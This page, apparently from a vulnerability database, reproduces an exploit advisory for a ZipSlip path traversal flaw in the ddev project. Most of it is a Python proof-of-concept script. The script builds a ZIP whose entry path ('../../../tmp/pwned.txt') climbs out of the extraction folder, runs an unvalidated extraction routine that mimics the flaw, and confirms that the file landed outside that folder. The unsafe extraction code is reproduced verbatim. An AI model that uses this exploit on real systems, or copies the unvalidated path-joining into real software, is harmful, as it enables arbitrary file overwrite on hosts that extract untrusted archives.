Lucene search
K

πŸ“„ ddev ZipSlip Path Traversal

πŸ—“οΈΒ 17 Apr 2026Β 00:00:00Reported byΒ indoushkaTypeΒ 
packetstorm
Β packetstorm
πŸ”—Β packetstorm.newsπŸ‘Β 85Β Views

ZipSlip path traversal in ddev allows arbitrary file write via a crafted ZIP during extraction.

Related
Code
==================================================================================================================================
    | # Title     : ddev ZipSlip Path Traversal – Arbitrary File Write via Malicious Archive                                         |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : No standalone download available                                                                                 |
    ==================================================================================================================================
    
    [+] Summary    : A ZipSlip path traversal vulnerability exists in the ddev/ddev project, affecting archive extraction routines. 
                     The issue allows a crafted ZIP archive to write files outside the intended extraction directory, potentially leading to arbitrary file overwrite on the host system.
    
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    
    import zipfile
    import os
    
    OUTPUT_ZIP = "exploit.zip"
    PAYLOAD_PATH = "../../../tmp/pwned.txt"   
    PAYLOAD_CONTENT = "HACKED: ZipSlip successful!\n"
    
    def create_malicious_zip():
        print("[*] Creating malicious ZIP...")
    
        with zipfile.ZipFile(OUTPUT_ZIP, 'w', zipfile.ZIP_DEFLATED) as z:
            z.writestr(PAYLOAD_PATH, PAYLOAD_CONTENT)
    
        print(f"[+] Malicious archive created: {OUTPUT_ZIP}")
        print(f"[+] Payload path inside archive: {PAYLOAD_PATH}")
    
    
    def simulate_vulnerable_extract(dest):
        """
        Simulates vulnerable ddev behavior
        (filepath.Join without validation)
        """
        print(f"\n[*] Simulating vulnerable extraction to: {dest}")
    
        with zipfile.ZipFile(OUTPUT_ZIP, 'r') as z:
            for file in z.infolist():
                extracted_path = os.path.join(dest, file.filename)  
    
                print(f"[!] Writing to: {extracted_path}")
    
                os.makedirs(os.path.dirname(extracted_path), exist_ok=True)
    
                with open(extracted_path, "wb") as f:
                    f.write(z.read(file.filename))
    
    
    def check_result():
        target = "/tmp/pwned.txt"
    
        print("\n[*] Checking result...")
    
        if os.path.exists(target):
            print(f"[+] SUCCESS: File written Off the track: {target}")
            with open(target) as f:
                print("[+] Content:", f.read())
        else:
            print("[-] Exploit failed")
    
    
    if __name__ == "__main__":
        create_malicious_zip()
        safe_dir = "./safe_extract"
        os.makedirs(safe_dir, exist_ok=True)
    
        simulate_vulnerable_extract(safe_dir)
    
        check_result()
    
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation withΒ Vulners data

WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data

Api

Power your application withΒ Vulners API

The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access

App

Assess and manage vulnerabilities withΒ VulnersΒ tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Apr 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.16.5
EPSS0.00418
SSVC
85